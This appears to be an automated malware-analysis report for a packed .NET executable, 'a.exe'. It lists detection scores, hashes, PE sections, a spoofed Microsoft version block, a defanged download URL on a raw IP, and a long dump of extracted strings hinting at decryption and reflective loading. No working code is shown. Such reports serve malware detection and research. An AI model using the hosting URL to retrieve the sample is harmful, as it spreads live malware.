MalScore
100/100

a.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 40/64 Related 2135
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 638.00 KB (653312 bytes)
Compile time: 2016-04-06 16:56:35
MD5: 96485e7338ca6441b3cf3b603949b2b3
SHA1: ecff355e2e2f57c43cfa4004b5bf4cfa0263d709
SHA256: 964686e8e59be4dd8212e8bb30b32dc7b657bb1b67ad857bd6ebc4abae9e044e
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 5 .text .rsrc .reloc D35EFnvG vaKCG3+l
Directories 3 import resource relocation
First submission: 2017-12-22 12:18:02
Last submission: 2017-12-22 12:18:02
Filename detected: - a.exe (1)
URL file hosting
hXXp://193.124.117.153/crypt/a.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2017-09-16 16:35:33 [40/64] VirusTotal
PE Sections 3 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x7d704 514048 4571ffeafe682b5e3e689fd995b0a155 a92b1cb63b4a00391bccb37eb30ffcb9f4f96585
.rsrc 0x80000 0x600 1536 06f32ae68fd92a6946c382a7bc392f94 241499c3e62efbcf60ce6589a66c35eb08df7c87
.reloc 0x82000 0xc 512 29f725ea743c1484b40d876b12f60d70 3bee2dd595a512bb6a29511c96d1859daa06fd0f
D35EFnvG 0x84000 0x10828 68096 a24aa9a32a8363bb32c000da14fddc1a 8f03da2ea5a0064dcc999d02051e93f668c70877
vaKCG3+l 0x96000 0x10a00 68096 ca32ecd3e58ccca75e0e0679f934a2c3 7d5ecefeac9bd0d4820baa55432a814a00580a5e
PE Resources
Name Offset Size Language Sublanguage Data
RT_VERSION 0x800a0 696 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_MANIFEST 0x80358 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright \xa9 Microsoft 2015
Assembly Version: 1.0.0.0
InternalName: a.exe
FileVersion: 1.0.0.0
CompanyName: Microsoft
OriginalFilename: a.exe
Translation: 0x0000 0x04b0
FileDescription: a
ProductVersion: 1.0.0.0
ProductName: a
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
KERNEL32.dll
IP Found
No IP detected
URL(s)
No URL found
Assembly Version
Module error
VarFileInfo
InternalName
1.0.0.0
StringFileInfo
Translation
LegalCopyright
FileVersion
Copyright
VS_VERSION_INFO
000004b0
:(!q.
ProductVersion
FileDescription
a.exe
Microsoft
OriginalFilename
Broken file
CompanyName
ProductName
u41
Microsoft 2015
IsWni
g3xLZmu9V
'! ujL
SB ~
.Xukj:H+
Int32
]I*q
Ew;j?(RM
J<! k
!ztA
_Le3/
14f|q
_LD^
i Am
P? &
1C3Gl
!1e}pw
[1?`pZ
ResolveEventHandler

rq:=
ad:m
[p,f
H x[
bLfQ
B=m|
q\r\(
pS#U
M:4_
UR>
NA:M
09_S
/w{Jg
:;3a
9'&J
0"-x
?<^G
CryptoStream
^l&4M
|akrSL
@/lD
Decoder2
({w
8:Jm
)fQ&
5G:A<
@vdk
>A/`
+(]Nr
rpO7
P4im
m\NSqO
gg#'
S`{J
NhJ<
3h=)
b<g ~
j#[
.oB,
ty7T
$t^y
#R|^
"CmB
qcwM105
XnXo1
X/ u
L26dNz
wMv0r_T
{K0G
X/ a
vQsc
!+c,H
F"o^
&lR4
i}J'
1a/
kv[T=
t'$M
2U )w
6~Bt$
@Lw{
T\T_
GzC'
[BrE$
$emw
-l m5
,A:9
yM!F
6(ku
j5"+
^OtT
q//klELt
SMD1
nZ&9
QJz
x 'a
PM D
Ql; }
z(l 7
N6'_
^:h
m_HighCoder
cR8OHsOD
8&zh
,+rd
h<Af
Mf4A
y*T^w
e]XJ
$Ij.
(sIR
-<6~
q {W
"G\s&
9E3U
,_Oa
Tf0naYW8YsC
ueIy
@FE
m_LowCoder
HXJ
'l@hQA
Fdmr
cDK450e
2EcZ
'@H*
gMeQ
H{C@
lff%(
0R;6
BN^_
sisalKH
D/rq)
E:I|`+
|h,K
W 8mo
`y.g7
OOxCb
&nmB
%.?GT
[%xQ
'\Na
!mU#
Bj9N
[$Te
8x g6
zdXr-
"xES
cazeimm
*IoF
V<8%AK
Z(im
Xss8
JLhb
w{_u
bS'+
<YSq
V&*Z
_},"
'#qE
K[,Z
y',bp
I]i#n
6**
V,udj
]!s)
o[l}
MHq9
&k[L
6DYpR,#5u
?~Nm;6
7#2n
L17CVu7
bZ:?
z~e
J_$$
~P<9
xM7WQ7I
w7qh
d`!p
zbvqY
`3K]N9:t
vJ4p
dU8c
X)(z
HashAlgorithm
n> MN0K
bOmh
tt10
!h+W/
G Op
8pFHfeU
get_FullyQualifiedName
Q sG
- GBm5
05WHlW6U3i
K q>9
I-q]
Code
B{Acq4
GdD&
-RLj2
6I&A
GetParameters
rWS!
n|(D
zQpj
t..p
.text
4C `
W8LIO
y00
#:nF!
o_ fwf
675GzC51
^w`K
e$F0
n`@r
7Z,sk- 7F
2g)g
_VA8
>C<`
5%/a
!}9D
0'/4
Cp*5
h(wb
4
I}?'<
3eby
gWDK=
o(w
Pvc0zrd6d2U
ikF\8
N+kk
I*OC
UoyG
"gs6
Bk2(AN
t-5^
+jRQ
1!Yi$
h>QaQum2
+ ,n
B{3p
L6F!sS
H0*q
yLgw
>loU5
}@_H'
4bE7
EnA>
+! ?
W/J o
[>a)
z(VrI1
YdR
+BC$
,9*$
yF/`K6
CreateDecryptor
]$R\6
StackFrame
bL\ V
Ugx@
flNewProtect
,~>n
jGk%v
%V+YP
asG>
z_bx`
.ctor
W23n
}[ #u8
I3uV
XX5=
#PHZ
qm1[Q
g/^6"
!7Zw
_L#2BH
<W16X
I7CZ
TfSA
6!4=+}
uhnU<
LenDecoder

8%-
)W5
Q I0y
]&- S9
M] U
bVN_
,k'}
pK>+,L
s'M\6
Gb9gB
%&Gq
1'^4
S ?jb?j
C.i!
0q98
5SW20sE9
": i
S1 9vxf
DBUw
/ Y.
>#23
Mv|w
FqxW
29qNFcw
`55?
d2R{
71gVxn
{fgv,%c
6E-_8
n^AJ
y^"
Pk;:
{^I}=
adJ
v,_a$0
# .
!LYn
5FfG
P2#
t"z$
get_Assembly
BXbJO[O
C#y]/
ZR&&
w m[l
pVRl9
ehL6
W#Fb
<!.t
[Y&N}c
I er
3? sE
TzL<vVY
%Q6fQ
Yq6ewA
+,hko
q?GSh
XW
I Nt_
m.q+
H- 4
A]J
x9Q[
Jg+D
,w4cj
%BiF
+ {
0-\J
~tsq
m8ND
Gf1f
d^4>
uQ D
4ZU
jg=;
Vv ?
{ x_
\$F=
~acijF
?2$S
| ,
_streamPos
=dLW6bl
&BU^
f|sY
\fQb+;
AJ7[
ae^m&!(j
tcCc
pe,Cul1
aB}&S
\E A
dpc3
0hz`
!y>n
x`oZ
xH,e
x-e=
uG.
BE%
((pC|
q+ 5
m_PosStateMask
$VyH|
iP*&
`TWv.
System.Reflection.Emit
x-]|*
g(#
^>[
viDi
{uf?
8oa/
MethodBase
>00n
fL_J
O2 =9
V* o
t J\
uwUu
z|`d~|IJ+
W;*
lGt*P
+w<"n
Cv,V3u.
yj=2
X X
4aN=85F
@SJA
a.exe
XDF4R
HH^[5p
___.netmodule
!5!BA
<UeXj
r -]
=\o:
kucd5
5Mu0
8`jR
EuOT<L
,``#
474^
wc>L
8|_`T
96w+
~sU;&
&:7Q
y4e.
7Tk8
>ILg
}9Al_
get_Position
Sf[K9
J ]*n
1 B
[IKH
FF_k
6MT6)
9}dAG@
6_
VB'ey]r
S\
X6#%
i=Ws7`
Q.2~&C
::%0
A=t/
>LCHH
o!yx
u(2
$=pB
3)7x ;=gl
-GC_
V<QY
k?2NmxL
(/d,4
dxeYxA
dDnt
<NF.4R
D[vj
Z(J|
w 4iw
w ey
5 ##
pC!j(
w P
LLG1C
~1) )ng
kW0<
SF\_?W
"& ^
]*7G
_[t >
y02a
/dpF
zWy2Cp
"4,k
*eU*
7_D_
>`/V
Cnh`
V>Ipd
IP+#
7Rgz
Qro(x/#pXVJ
+$B?
p5G
>t[ntN
!v)E
nI_A
b%h.
Tw-k
1LY<[
%oNy{ a
XzCk$
{#2=I
(b!)
IWY<EBc
@39%
!|b1
dh0:
1X*G|
qCe6
@c dv
W[K2"
,$]i?
m_IsRepG2Decoders
K~z.p
qc+7}
m)5.Q
$0O:
1H{
l(]*)l
BSh4K5
kBFU
-x,*m5
l]-~
e08"x
Nq ]<8
Cl!}
ig)$
9rJ7=Yr
Q`sb@
Gn{D
Ak,@Q
<&{
8U2z
V ibP
YA qRY|
&rp^
,HV[
yaVV
51wanI
XUy@
5 F
NhXB
o3l[
whJg
Z c%>
Xtu9 ep
!=f^
>eN
48v8
0 (6o
GetEntryAssembly
_fEr
w:P /
J\&d
:x*x
N$%.
^x\r[
D/P#NWw
IhQN52
0KZ}
8nyX
yf ]ex
3uL}
aP#8-m
i6SD
}%K
uBU-
4BhnK]
t!miG
+#p@z
#YQ|
g7UX8%uHm
Z c:
awmp
w7 `{
.?P1b+
B?~[x
F*;i
@^I+
dlWc
(|6b
w>Phb
sQhs
mY F
J{{*
<U2Y
'3jD
]L'Q
d.J+T
4}! N
Cp?Z~C<,
}Vapg
c0lkJr
get_IsStatic
a\Woc"
UTsG
^/X)K
{4\GpB
@!4k
qN2C@a
2i8f
BC ?
XD`j
j>S\
K}LA
:b/(6jQ
/;Mi1
k94
-:llHU?t
N" Q
'yt[
hnw]3
\SX i
<k_
Z>EO
;=-g
C]+:
HJi^
J0-6
TE`Mb#
WCi)
d[+0
+#V$
i4"M
6Vq|\
y|0gEl
vWEe
numPrevBits
kXK5
\# |
p/}p
6xBy*
&ZC Kih
j?*7
H?*f
Fdq}
[%L"!I
{,VC"X3
OutWindow
Z2^[
G4KX
|0bg
.|'`
Ea7@
CG1.
q'Q_
,mZ
S/ &
VdXeQ
ip`j{@
y4IoH5Zjv
IUec
t9c
Nzx"\sy
c='".p
YRK9k2g2aHu
{{#%
+4~~
H|Hkp
uuep
H M+.O7
p 0S2
>C&Jq
"2Wr
RD'J3
q XA
#%oc
xcK4
NumBitLevels
07Q Uxy
0jN9
/A3f2
o]Rr
a@ +F
jS##N
Bcya
'd S]
GetTokenFor
cNNUZ
,ibxw
}y|R`
YQ5N
5L"c Xd
9{:
k-}>
2U6EtZ0DA
i mg
`!`ml
Invoke
~zE
xurF
Fm+X }
Av5'~
w FJ.NS
+C b"F3
40f r
z:a9N
} P#G
iv]c
k5osq
eY]k
r'|^i
rZA=
16fHTcg1
~Gyw
G`lX]
6BkY1
c+zm
qH:"8wF
woa
P`OL
Array
L#yvt\
tnZ1D
0LKAP
NsX?
Zk<;
~?z
X),|
~d ]{
lP0
=>0p
Vy?b93
;NKLq
!j\B6\
Gp&/Ho-1
98 ;CM
h4WT
G3(F
k_1@
$-#6
u*2]
INpH
w n{,
DynamicMethod
zA4P
03x2
%,yv.U
KUf07FZn6
lpAddress
UQ Z
7oi^`<K
dZ;i
1R{k_*
095raTz
3l[y.
)\m{
l+3y7
'ZqM
#O
LU)-
^:MA\
:%my
K0Om
H.-w
~<hJ
s5V2qKU
qb%Z
KWTO
S_2o
bVU1
KJ'</=D
Hzr8
?zS|K
kV i
1"*C
t}wv
!(=G3
@sMD
i:KB
GJ`Q
Sl6{
b O)
AK&ZoZ
i`(E)
0gqB
AN8igA`c
k'i+
aW7Wm97Z2
%U 8
^%!FtJ
3q86A7G2Xb
)v4
9* ;U
m`Tp
Tx4t
1R <
_-#B
>G |N
q6p=
hb+B
IH8yD
^$8
kCTEO:Gd
0%us
Vt%Gx
Dk+
eajT
$Pl
4q6N
0fuFBj9
_`kr
(#i}k
LXj;5m
\qkR&
\ f]
0P:>
2F3CXrr
}0<>\
gX|"
Spc
b8o
iHcB
g:k=
gtD<
<P':%
* unu'
Pt5S06
J6!v
@bCQ
NL2m9
+Taf]dd
4Ip8
v^ n
Eg^-
| 2|
BD35EFnvG(
$67J
GW94x
,M;Ke+%
3p'5\
*%n:
@o9^F
x~H\
S_/X
&48w
{%f^
Da<b
<:^
6JJh
R,sn.
*V y
?.M>
Jt&_jcd
GetExecutingAssembly
sLQ>
i@N{
,S n
;f%RJ-~
6Oyb8sVbJ
o_yp
lm.Y
jRoPR
>Sa~e?
Yr6If
wO}7
O[f3
3MT|
8rZ=
! :F
*b|"
(_@{
Z( C_
hQ;
f,<P
6 8S
npJ^
3rbU
tu?w
u{TR+
uzfZ
}D^4*
PNi,t
H og
eL{
xy[\
7IZ(Ri
nVe~
9y0G9TS6zO
LX1s
V$4
.Hmz
lK*W
h9>%x
oM!+
&BYP
r={M}
K)3ROr
` N~
j9 v
!Gq<
1t%A
FdwB
~=df4=
KD3k
fH?J
g}Ao
FT} G
HQ w
kl.9
{I"]
f9loPa0J
":?ap
!rIv
Gtud r
3cL%m
V'1v
tf!q
ghu)E
2_ [
>'0lv
M,z|8
E?(t,
>`I!X
{EPHNQh
=%dt
vcZDqU
%A})
FrjP
UnmanagedMemoryStream
u^?d
g7:
n_r
gF3eSTSOy
=rEeb+W
f[~
r b#
S "m
T51
k`d^
aSo(
$FC`
|-WF
_fdc
t3uN
SxEs
nort
#Tk8
,S,T
" HmK
=|rL
:3;3
|STXB
JF`K
zKz6MXs
oK(V
$,;SkEp4
3m*h`v
t5GjA
*iA-
kj'8pm
ULgf7
p!Mn
nA[\
.An>/|
6h*#
# 5Da_
+b=;
PYF4
-rws
yUyC
G4rZm
jq?%
IP $n
>rgf
q$?H|
["3wp
N7v L
Ry0a
v 26AVQ
eWE4
?jukO
r4j867O9Ay
t^GC
_X-e
k4"}
kg4Y
Wv:V$t
bej4
@vaKCG3+l
7vv7
UInt64
gE X@
T:hH
};1i$
=O;XO
b,y~=C(
Ip!S*t
bD}$
:{Jh
X)?
)n %h
8<U0,
-b,B
\kF#
|,|E
,<+*us
U}%H
V5)F
a@fq=
to[
%g)"
7v|arX
_J:nli|
ELgn\)
Mdi4y
Y59LHOTQP79
.%c,ZYb
1D19b
|ie%+
o@5>O
6Sz}#x;6U
m]]|\
!}J h
$].Q
JJ$)
Q"+4Y
&oS/
3}q}
vjtl8JhvF
/o`AG
)[y3
8Uvy
iW"w
@ ~H
N=yV+
cJJb
9L }
9_<~
*E}m0
FVg86r
j-6[
46dd
6Zo`
\C1j
De{Z
kw*j
wO fm-
mP`yLV
&H?<
y1NE
6arz
'r74
gNgb9
=(m
9aLzmpBodi1U
N{2 20=Q
8?O=
HO!`I
!This program cannot be run in DOS mode. $
H3**
2!6O
i0?+
96YQH
"8Ev;
p"vFq
Dispose
ko*>
m 9f
3X)'
g/vlmdM
Q9>DI
i6x{
n?dqt0
KDVQ(:
0]D\
/1a?w
&PFS
C,`=
-|09
k22W8
:@s/
9]C&
x?"-O
7HAA
FI64
[B|i#
Kav hT
Y U6#
?eR7
V(SK
45I_
S~ib
An,+
^K{o
{gF<O
*#"( m
x|I9
@R4-
s8wA
ei"lK
,Zk,
e[f/
fWkm
pQQQ j
rJ@{_M?
.Za+
58gH
8Ri ,
Zpcf
tAQ<
YwYs
! +J
uJ!+
6@2
7a"q
N-r <
j5Y.
EO!i
t;>*
|m.<
B1c%
hN!+as
v -0
;Y.$
,58&
V3T1RU
B*@"
iBk/
@WS(
GetCurrentMethod
w5dg(
kdIr:
bTeM~
wIQVe$1
KY)S
W)mlH8
iiVj9
S|]&~E
hjD|
]#NF
^ca/
nJ:_n
,7[~
>aq 8
y> c
BlockCopy
n_3 "
Ht5_
l&k&L
'ce|
}*!5
EBLkyEzn7
SizeOf
lpflOldProtect
jx:w#rS}{V+
gL#V
cdR~
@X8}
o@mp
k<qJ!
mMDT
TPGT #Zg
.XA4!
bt0h
\wlTT
/N$@
N`<#r
.S'l;E
CUyV
sII0
I5.!f`
Q3r8Gg0Jl
6R
[_L
2Du"
Boolean
IUagc
3n_W
(Z&D
D[oO:
r(Zh
9wGryA
{@%3
MethodInfo
Qeka
J>!q:
xY& Q
cixB
_IghA
+n.]
MD.GyS
yHk-2$
9Jy7
K[Q`V
MemoryStream
5\?!
%%xx
vm _o
IyHJE Y
eLR)
5m~g
vJa[
o8Ka3
aJzd
Xd3N
]t;!
!8e/
\LYHI
DstXSze
yc]J
s&?a
:J(X
&yjJc
K7r~g
[M:e
^'N@
2 (J
j#f"
T Dd."
=2X}
f#:!
2,eg
'T6x
Vg>q
9{S$
1AU26sX
n~L9
X**]<
A#d^
&X9T^
k .{*6c
# H4
Qn(Z
-pd 8
w 1r
t=$
N0 4
}` =
[G0S
fY6i
F#5r
k52$1}
jtv
{ \ Sq<
oOdO
TksM$m
XKVPp
UpdateMatch
zW:)
+VS+
6;f2
|gR
iVn6<
&_G>
I-yh
C)<P
bAGQ
t^{@d
@P`1
VBHZ
7Lg]
matchByte
RL$ a
N{6_
@#)T
8|1@
@A*CH
48o%
P"=I
aG34
K<uL
x07dTuS0
g$Ol7
xBbw(/
qv\
ReNc
(f; 1
VWe$u
{ r
=^+*
+;9b
m_IsRep0LongDecoders
LuhY^Ph
KG'V
.Pp
:V/'
?.bk
#mG'
X^0~~
System.Text
kQbx
Dz<*+z
>zDX
paT"/L
5Bai27u
'tc}
5tFFQ6q35
R$@{
h OpN
$ J%
y uD
2nk'
BitTreeDecoder
@64_*
''/p
@q;GF7
kYq-
EBs/
J<@BY
%- m
d4osmg
yr|d
`C~0
7I.\J
p- _
8p]e%
.9 Qx
qMEWVe
2}<M_)
)J u
wu,Y
z ek
i2n~)
m #.
K-OZ
2e7h
GGs"
OD"
ELP>
'aJU
m9w6B8AWx
va)Y
!]+u
E"T$C
>*Z#
aq \
].`>
TryGetValue
,'>+
_CorExeMain
$*Dk
f6bf5
h#vH
tX@2
~B ZF
/cfBn
Q~PA
lL7Tl
tPUZc
fJ7 ?
?|OF
y9Ya
RZY:
*RhZEq
f~ {
=W6|
C_Uk
ToArray
5Y9E
~ a/u
/!=%
=6g=
">|^_0
VY\~
RE*>
(bsT
$O;
iUnLeLm4l
LoadModule
B4T9
U]T@z
RI
') f
?bVRZ
dTy/
mW{
w# x
wW$@
u)6\\
ZhGVY%Q
da#v
YfA}
w%#%
:zE$|
1Jc2
h}-r
g1sQLPEL
6.2\
&+[[
o*\_
J.rR
z*}c
nhWa
]{TO
pTo,
a:yZ
<"Dn
?lCjs_X^
)1On
I"Bd
L)rg
}o
j,m3
AxU@
33tg00c07O
_Y\1t
$JQiu/
thDu
~7a,
6\ Z
s'i
JG=[
Pwm{<
}% q
{6'pr
N6_z97
X;PU
o Y[q
Wa>~
"f N
/jS,
R_\W
!haC
`E&p)
$"q;
W.z
5aO{9K'
xAXS
{NLW
1jNh
<SnP
Y?jDTtG
'qbI
"A f
BadImageFormatException
9BgnY0q1voH
UrgBZ
_l.e
2BDa5l
)AW
!GM
c3?K>
j~;H
5Oo[
#:k6
a^0 V
uIE Cff
>|a =
c5kCe
{g>fo
d\/KE
31Cv15CRL
3381
b\q('G
[Cyn&
?$7
PhP`
8webn
MJr-
Jxbq
Kbvq
B?7CN
6i94f8VBa9L
llS?
xK;m
Cigu
Stream
hJ&=
.uT@[*
vpF>>
eBzh
ATp.
'Gx2y
~$) |z
$99k
_solid
v1IF
<\gM
IpJ2
cpMxT
FK!.Q;
C^<u6s
laq2
ZSfe S
>d#A
Rpvv:
8J{m
/O}9\
0$R-
#FM
EJqs
NM(Ip`K
)gomJ
` S`
nWxQs
)aJ$
g Np
TT{
Wj01P7
76|
`a R
d9ILO
q5zUP!
(46{
]U#!
sliw
_qtO
^jUV
kTBd#
C*X7
Gc@
ApSA;
],-w
;VMA
-BQmN
2PP
&:j^l
S'B~
{PZ
;U P
UgZ{zA:
get_IsInterface
2VQ3
H7b1n}Y
[pLD
X)cAz8
%d~=ky
% E_
JJE<c
>|v
92ykW
=qP$
%F0Eev
W5=n
$F?h
2:m
E0yp
QZ:z
zW8B
h0 8
-0o}xVk
=u2gYh
bH58Tn2
h::O9
Rr7h
]IP+
4QwY
i[ j
WG?\
V!z
]*?&
!dlLM8
SetPosBitsProperties
pO_y<
B:d|
CHo
A[`[!
%eRp
LS}2=
1[!V
oO_V
vlw
WG?
IBf)
$Y:+'
B#:K
c@5\
:C;+
X1T{
or1&
9~(F
h"\%
|*,}PoJ5:B
S/&'LU
'aD5
TM85616
kYs(
C0S|
s<M.;
fkJo
6CwfbE22mom
=;SJ
94clo4
5(Gc
O eC
Me>+
IsCharState
(#]Uo
~C+;S
kY11e
} Ov'
UT>,J
{y$p
CoO2
prevByte
e69X
v5U;
m,9~
& o
0Ep=
4wda
Prob
\zt}5
{%7M
VUrQ
.5Vfl|
r3d^
2U-_p|
LV
`L i
Y@ ,t
zaE3
%I(7M
NBH}Z
,ne7m
}o,6
/)$Z&
r|'/
'rnQ
La'Z
#t v
pX8
>7><
"9yi<j
-Y884:
=*F2z
.rt.
"NOj
NzemoJI2T
0;Ft<
7d\9
h5VK4bWhG
gP[7#
BmWU,
j`Az
TKYy
|>m+k
@Rml
IGIm
X<-UV
;<_.
aV5or
|,H
N ]^Q
g 6
G&HK~
y p+X
T~h7
dnM;
"{7 -
Mh<o
7V7=(9w
yn0ZNPTt45L
+*"A
t'}^E
r;u$
! zq
m<a4
_;X3k
/o2F
"=.7+T
g;hZD}y
yFXE
$V*\ ~5#
Vw-0
E!^]
lX?|m&
+>H*
(M^$F
Hh0aO
fVBq
+?4(
1Ja}
_c+<
o4L|
>Y!
h|$~#I
l6Ca7
]J-O2 +.
k 1X H
h/6
pq*H
t@w_
$5S?
zj[4
@G5S
_gx.x
)*gE
5EzjMF
jt9K F
4>5-
vQo7
E0C,
qxe~3 W
}-i*
R@.v)p
?PM/
B:O=\
bMY|f
Do:wd
bXl U#
T 3[\
w>X8x
?]Cz
. *e
IDisposable
vg$d
K] 2
tc5:
m "Cs
S09vix
CWG$
[ we
,nlp
%}X
$O>e,
-5qO
DyUC
%>Xh
v%HH(
\sXy
<Sw,2
T<<;
Z$Vm7
:JHE0
(?wp
:w}p
94j!?E
./U1
n@6J
.3I<
jlR-&H
"j>,
<} A~
4xgda
90WfKl
#m>b=t2
j94Y
\t6
!GAO!
{t k
vjK<U?hse]
@@f?B)
9RWvo<
D8L3
BR;<
Init
au 6
N&O ! [
35 =
U$"w(
eZTO
OI:k
T9B
<q$iM
,,f/+
~SUx
#GUID
. K'r
:g}u
/>7J
8vDYh9O
6cMFK
OXSpF#
onphHH/OJ
U,#E
N6b0!
TXgu_<
R?STw
~j'}1
DWlM
z_s)#K
_@]<
L "&
suM~VF
Z8ic4xa
ed/`i BI
cT#;`
.D!Rn
qnj
"yhAv?
Gr2D
4;/I
bR )$m
YCYAEcdA
NsP^
A73P
? Qt|[qqT
])&:
J(tA
Q+.Fk
hn}GFF
/ @!w
+ Eb
8S7P
&KP}
u$^RH
yv3K
Q7D53M
I EF
P x*F
M2(#
z jM r
VI}c
IBdL
5 UoQ
3C u<
fEV
jdrd.
`]qg
S
Th3f3F
zlVC
\|I*
mK%8
5*g,
vRzy
RjEuoLa3
?fzK
M]#)v
iAK0
2(+o
;1aF
=x+2
k~`9
|= K|\
q;QfLI\
"Oxx
n BR
J.Y]
# ?L
qJe
3,>A%
4R628L
(V<
IBc]<
/dzZU
mscoree.dll
@S|k
b *Pu,
{Q)X
w:Jl
!%kxCY
zm\O
XXDPUb
n)r-
._qU
J10 U
QKAH#
^R z
Q1,Wx
4!p S
%c+g
7ESP
>~}^3
DO:J
tVR8
"=5Dg
f*Tx_
K 79
aLupn
j@*e
!_tm
{vqC
6>#M
;GWs.
^$
+PZ~
OWrX
4 o\
`O 9`
%Fnq=
SOz_!
i;%|_
zs/
7Zh ~
=@O k8
Z9dZ
J^Jog
M>p
Bf$~
SaCDzvk
YZihSCK
LJ^#a
P' $d
-fm(
c&$5W]
=syU
6Q!c
SWG4
I|EJ
b#)y@
hp.5*
b r
46 j
z8QI
o Q'p[emf
fAbN
]'Fk@
QR@R
2w v
pv:M
ACnup3
y-4e
dYvBy
v!:.X~[Q
{F<sv
LLo|
5+~.u
A"7
w5|&
TkE
9'4&
'|N-`
@'}}
N]BY$A
5mG]
/\qn
B ib1
3DhH
2L]O
V8)T2
?.n8H
=w_(a
u{^
PWIs
ReverseDecode
$rv1
jlMa
Q]/
r0 T=
b>$g
/.p%
uW+Z
AZC+
? +
~pEh
1i5<|
cP]?
583ndFs
s}M7(4
'NP1
i->k
Marshal
a0h=T`[j{Y
LWoF
=AB gv
-Wg*
Bfn
UBj06r
)YNN
GIb5
gq.gQoW p
g.0.Z
ez~dL
*H9UH
uv,SC
nl~HLEU
!:|E=}@f
7aM5lyY
Z'tN&MV
0B-`
ILi
n=/"
Z,7
Vv>e
QmoJ9aI
Xnft;s
G#cY
i3vz
>\_Z$
E4mDRxcY
<;a]
(r 3L
H`n{4Tb
Vm U
Gyyj
>M,
7Cr@
CO t
}9#KE
>V2E
}ek5
WRAa
"%B
|sXL
HE?r-
r,US~v
_K#Z
y'*q
aX)L
wj&+2b
Z/w>
-)dI
AppDomain
m_DictionarySize
CvjPwD
vxpuI
pK6W@
+<K
[JKm
^r<d
09 @G
e{<,
tgK)
KZF)
Hck
u#9
o!U+\
CXGtd
d'1P
52r2
Bt/l!v
l D
LiCcG
VBvV6dshxy8
)yWD
v7bMa5W
~@dr8
-~+~
E~h?
d&0/l
gja
7 27h
tCHl
kK '
\^}J
:FXL
,"LW
y#7#
.~w(
/T{<?F
kY]~O/
TeBk
t,h=Sz
|t+VTN
ToUInt32
D"\G
OVL9
2i5DIF
1|?C
ns 7
q"2|
Type
!7k\
p6Y&
JX ?
H|.i
rpp=FS
ZhBXWc
6xZ
'[BNg\
,'|
lfl8H6v
+g(1
Na5wX
S6$_
*i&o
$a^+
VQ0SFV
O>bX
a7Gn~
wrs'n
gMP0
$K23
GetByte
e;&m
)"Na
: YCB\1
!ad
yemgcORF
~ nMfe
? H5
w4]u
,-uD
Mfa)
#Ns;3
aKER
Ywl(
&wpe<cw
[-CP
FT.{H
>aRwy_G
eD S#
`|pm
< 8$
$< b
h(0\
x@%
YVwx
tI`G
8vKP
.x]
;G{At
?h8`
90j1KL3
aPaU
r "f
'XBv
\ g0}z:e
7I9w
M<xa@!
!h>xr
l2'd
A@5K%
Z>rGvl5t'
+u,7
,FS^
GetString
?FBTL
yg K
3Z] &
}\ S
&9w1
2&UJ
hx!
n(|yj
&l $
#sm `p3
}OuF
S^F$
ZY<u
{c,U2
JJy<
sXz54
Y$zN
}V4UC
x3-
^W&;
{Abl
sJ Pa
Monitor
YV?z
i^y m
4-K^
FEOW
Is'US
W )6
))"
U7K"
wTb/j
,_@S
F?v?
L '#wU
ha3G=y
?4&;H2
)sxJJ
0^H#(
vhO
]VByCB
RZg)
j* Z
rXk-'erg
+i6 b
8P9d
mep^
&*z6
s_|^#
^bfs
~WWj
fTsf
>_tr
`.rsrc
E,i*
`rX|
F8`m
z J
X@N3
]k|2B
sjaDMg
+7/X
[e"H.
SetCode
t8t [S
q\ d
4sq~
xavP
x{xS
*<MTF
<P\p
:]Yj
7n-S
zH$"cSKs
9=z|v
g%eA
DecodeDirectBits
jL2]V
!XPXlP
BSJB
#(4@=:
Rh7t
I5KX
&9?<
g,2L
8K*k
5ER9
(ZM/
V^.A
.}(LJS`
Ot5DM
3&UH
G =p
A{?A
v]8PY
wEY-
b>Q
/0 9
$uKM
L=A
evi3qEyt
?/!`
^$694
L<^!
wrPU
LMmRZ
C!lUM
.%\7J!
41("l
/ip[
y# r
get_ParameterType
R .
w4`/
ggL?
6wcG
;N{Dc
?}jg
/=bV
y ^ :
@2s^~
]i(^
DIfR
|kQ> [E
dcLPHJga4-pZ
moe`"y
>g4`W
0Qp
@=} R
GH3xa
n@7ZF
_ TU
MWlcc
aL dUu
-o<P~
aXt{
m_IsRepDecoders
Jg%T
0wY=
G{}^
L4L 8
D
*{8f
HUpK
JWV9=
7x'u9
e%5S
"|Tn
wD]e
:! x
5g?q
+u5>9
mrYSDpWm3
n`0sx
"5K(
f!nJT
/'8h
R$7Z[
; 2~Ga\
S~9:5
.=_!
:S qT
L6e H
>5 )
l>aJ
06*.F<
eu2Y
z4Dp
i9r.
<Egd
3KxP
GIyOHr
,J-^
j3M)
op_Equality
m_IsRepG1Decoders
c![rp
8Cs9
!lnc
t12uBB
JWC$
B x2B]
^^(P
+1>7
hLdBD
-"N$
#w$^9O8B!
OV-W
c/$);eO
v`Gv
%!lB
@k9v
m{@<
PtwTt?
x Zq
nOC'5d
"M*E
qJ!p
^LWtk
B T6/
|<?%)
properties
R/2q
&-es
S1-;
~QH>
~>'n8>
i~F4
J'^3
J)PKM&
.K;X
\&e-ZE.AM[
~SI/
K! T
9X2i0
gE-o
VPW:
F;gq
@<gP
9>yx
QQ3&<-+
jrmg
iLg aE
]WlSx|
System
$F9I
.W|n~9
v C7
d^nB
a/aA",
]a"XKz
add_AssemblyResolve
kN-~
YdS!
$gA=P
*MAZ
9s1vY
3DX97
x|^;
eS{5
9?c0
$}tJT7
Gle0pR
k#Nby
W*{P
Q=tF(
-\(U
tBq2
WSO<eT
`5B<
.q\U
]4k{
mE7N
3m=z
3c~}
d)4\j
xy<G
$Su }e
Gi8gKq
Bg9M
497n!5
>38>N
K<6G&
chNs
$TZJ
i3M_
vPfW8umI
8?QI
=nM0c
W\Dh
HY0dq
66KL:
\p<q
C?Uk
Df"5Z
]P^\
j5G3z4B
W6W4
`K(o"
U @^u
9HBo
^\?m
ZP^
rK1vb<
_c! >]F
XnyW
